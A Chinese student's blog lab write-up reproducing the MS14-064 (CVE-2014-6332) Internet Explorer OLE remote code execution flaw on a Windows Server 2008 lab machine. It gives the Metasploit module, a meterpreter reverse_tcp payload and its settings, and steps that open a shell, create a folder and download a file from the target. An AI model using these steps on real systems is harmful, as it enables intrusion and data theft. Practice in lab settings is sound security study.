ms14-064漏洞复现


这是我在实验室学习渗透测试的第五个漏洞复现,一个多小时便完成了。学长给的要求只需完成查看靶机信息、在指定位置创建文件夹两项操作,我在看别的博客时发现还可以利用该漏洞窃取文件,因此也自己尝试了以下,写在了博客的最后。

漏洞介绍

MS14-064/CVE-2014-6332为Windows OLE自动化阵列远程代码执行漏洞。当IE不作访问内存中的对象时,存在远程代码执行漏洞。OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,用户使用IE浏览器查看该网站时允许远程执行代码。

受影响的产品有:

  • Windows Server 2003
  • Windows Server 2008
  • Windows Server 2008 R2
  • Windows Vista
  • Windows XP
  • Windows 7
  • Windows 8
  • Windows 8.1
  • Windows Server 2012
  • Windows Server 2012 R2
  • Windows RT
  • Windows RT 8.1

实验环境

攻击机:Kali Linux: 192.168.227.128

靶机:Windows Server 2008: 192.168.227.130

复现步骤

  1. 使用msfconsole命令启动msf,搜索ms14-064的漏洞信息。
  1. 使用第一个攻击模块,设置载荷

    use exploit/windows/browser/ms14_064_ole_code_execution # 使用第一个攻击模块
    show payloads # 查看有效的攻击载荷
    set payload windows/meterpreter/reverse_tcp # 设置反弹连接shell

    之后使用show options命令查看需要进行的设置。其中,AllowPowershellPrompt、SRVHOST和LHOST需要修改。AllowPowershellPrompt改为true,其余两个改为攻击机IP。设置完成后,使用exploit命令生成恶意网站。

  1. 使用靶机用IE浏览器打开生成的恶意链接
  1. 返回Kali,已经生成了一个连接session了,按一下回车,输入sessions -i 1连接,入侵靶机,打开shell,如果乱码,则使用chcp 65001改变编码,然后输入whoami查看当前用户。(第一次失败了,我推断可能是修改了编码的原因,因为第二次打开shell后没有修改编码,发现成功了,之后又尝试了修改编码后输入whoami,依然不成功)
  1. 尝试在桌面上创建一个名为test的文件夹:

返回windows server 2008查看,桌面上已经出现了相应的文件夹:

  1. 尝试从靶机窃取文件

    在桌面创建一个名为secret的文件夹:

使用dir命令查看,存在secret.txt文件,返回meterpreter,使用download命令下载文件:

下载完成后,在目标目录下查看,存在,说明窃取成功:


文章作者: 恰醋
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 恰醋 !
评论
  目录